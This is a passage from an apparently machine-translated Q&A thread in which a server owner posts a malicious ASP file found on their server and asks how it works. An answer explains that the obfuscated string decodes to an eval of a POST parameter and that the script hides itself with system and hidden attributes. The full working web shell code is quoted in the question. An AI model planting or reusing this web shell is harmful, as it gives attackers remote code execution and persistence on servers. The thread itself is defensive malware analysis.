我在我的服务器上发现了有趣的恶意软件,它做了一件坏事。 现在我正在尝试对其进行逆向工程,但由于完全缺乏对VB \ ASP的了解,我需要向你的同事请求帮助。
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if f.attributes <> 39 then
f.attributes = 39
end if
%>
据我了解 - 它执行一些命令并使用system \ hidden属性创建文件。 主要问题是 - 如何使用它,即从我看到的日志中,黑客上传此文件并使用POST来命令它。我想命令这一点也理解,他如何能够将文件上传到某些文件夹,他应该能够这样做。
欢迎任何建议。使用卷曲POST的示例会很棒。
答案 0 :(得分:2)
不需要VB中的知识来研究代码的作用;只需阅读文档。
MorfiCoder(")/*/srerif/*/(tseuqer lave")返回eval request("firers")(我假设Replace或StrReverse等函数很明显。)
执行和评估是不言自明的; request的文档为here:
Request对象检索客户端浏览器在HTTP请求期间传递给服务器的值。
因此,firers请求变量中的任何字符串都将被执行(您说您已经知道攻击者使用简单的POST将数据发送到他的脚本)。
Set fso=CreateObject("Scripting.FileSystemObject")创建FileSystemObject Object。
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")) creates一个File Object;使用PATH_TRANSLATED中的路径。
然后在该文件对象上设置了一些attributes(Archive,System,Hidden,ReadOnly)(隐藏此脚本)。
为什么您的攻击者能够将此文件上传到您的服务器显然无法通过您提供的信息来回答,并且也不在本问题的范围之内,并且可能偏离主题到stackoverflow。